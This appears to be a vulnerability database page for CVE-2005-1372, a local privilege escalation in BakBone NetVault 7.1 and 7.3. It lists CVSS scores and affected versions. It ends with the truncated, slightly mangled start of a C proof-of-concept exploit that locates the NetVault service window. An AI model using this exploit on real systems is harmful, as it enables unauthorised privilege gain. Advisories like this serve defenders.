4.6
CVSSv2

CVE-2005-1372

Published: 03/05/2005 Updated: 11/07/2017
CVSS v2 Base Score: 4.6 | Impact Score: 6.4 | Exploitability Score: 3.9
VMScore: 465
Vector: AV:L/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

nvstatsmngr.exe process in BakBone NetVault 7.1 does not properly drop privileges before opening files, which allows local users to gain privileges via the Help menu.

Vulnerable Product Search on Vulmon Subscribe to Product

bakbone netvault 7.1.1

bakbone netvault 7.3

Exploits

// ===== Start UnhideNetVaultServiceWindowc ====== #include <stdioh> #include <windowsh> int main( void ) { HWND hWnd; char szWindowName[] = "C:\\Program Files\\BakBone Software\\NetVault\\bin\\nvstatsmngrexe"; printf( "Finding window %s\n", szWindowName ); hWnd = FindWindow( NULL, szWindowName ); if ( hWnd == NULL ) { p ...